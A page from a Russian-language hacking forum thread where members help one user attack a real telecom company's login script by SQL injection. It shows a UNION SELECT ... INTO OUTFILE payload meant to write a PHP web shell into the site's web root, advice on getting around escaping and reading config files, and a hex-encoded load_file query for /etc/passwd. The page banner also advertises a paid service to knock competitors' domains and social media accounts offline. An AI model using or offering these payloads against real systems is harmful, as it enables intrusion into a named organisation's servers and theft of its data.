Ваши вопросы по уязвимостям.

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 114 из 296

114

Опции темы

Поиск в этой теме

Опции просмотра

12.02.2016, 10:49

Setrus

Новичок

Регистрация: 12.02.2016

Сообщений: 9

С нами: 5395286

Репутация: 0

Цитата:

Сообщение от kostea

↑
http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=UNION+SELECT+1, '',3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29+INTO+OUTFILE+'/var/www/html/platformaonline/template/new/scripturi/shell.php'+--+
Что я делаю нетак?
Раскрытие
http://my.moldtelecom.md/scripturi/a....php?username=

Нет прав на запись в папку, судя по всему.

𝕏 Twitter Reddit Telegram Копировать ссылку

12.02.2016, 13:15

kostea

Новичок

Регистрация: 23.12.2015

Сообщений: 29

С нами: 5468726

Репутация: 0

Цитата:

Сообщение от Setrus

↑
Нет прав на запись в папку, судя по всему.

Когда нет прав пишет по другому

15.02.2016, 00:04

ghost8

Участник форума

Регистрация: 29.05.2015

Сообщений: 110

С нами: 5768246

Репутация: 0

Цитата:

Сообщение от kostea

↑
Когда нет прав пишет по другому

Экранирование

15.02.2016, 04:30

kostea

Новичок

Регистрация: 23.12.2015

Сообщений: 29

С нами: 5468726

Репутация: 0

Цитата:

Сообщение от ghost8

↑
Экранирование

Приз в студию

15.02.2016, 04:49

RWD

Участник форума

Регистрация: 25.04.2013

Сообщений: 153

С нами: 6868406

Репутация: 2

Если я правильно понял то это просто ошибка и ни о какой sql inj тут речи не идет?

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

15.02.2016, 05:12

kostea

Новичок

Регистрация: 23.12.2015

Сообщений: 29

С нами: 5468726

Репутация: 0

Цитата:

Сообщение от RWD

↑
Если я правильно понял то это просто ошибка и ни о какой sql inj тут речи не идет?
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

http://my.moldtelecom.md/scripturi/a...ord=or+1=1+--+

Вы или помогаете или не мусорьте

15.02.2016, 09:45

ghost8

Участник форума

Регистрация: 29.05.2015

Сообщений: 110

С нами: 5768246

Репутация: 0

Цитата:

Сообщение от kostea

↑
Приз в студию

приза не будет,т.к. экранирование на запись в файл не обойти.Только на чтение файла

Читай конфиги

15.02.2016, 16:00

kostea

Новичок

Регистрация: 23.12.2015

Сообщений: 29

С нами: 5468726

Репутация: 0

Цитата:

Сообщение от ghost8

↑
приза не будет,т.к. экранирование на запись в файл не обойти.Только на чтение файла
Читай конфиги

Пример можно а то читать тоже неполучилось

15.02.2016, 19:33

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

Цитата:

Сообщение от kostea

↑
Пример можно а то читать тоже неполучилось

hex. прочитайте статью по MySQL injection

#10

15.02.2016, 22:56

ghost8

Участник форума

Регистрация: 29.05.2015

Сообщений: 110

С нами: 5768246

Репутация: 0

Цитата:

Сообщение от kostea

↑
Пример можно а то читать тоже неполучилось

Код:

select load_file(0x2f6574632f706173737764); // читаем /etc/passwd

Страница 114 из 296

114

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules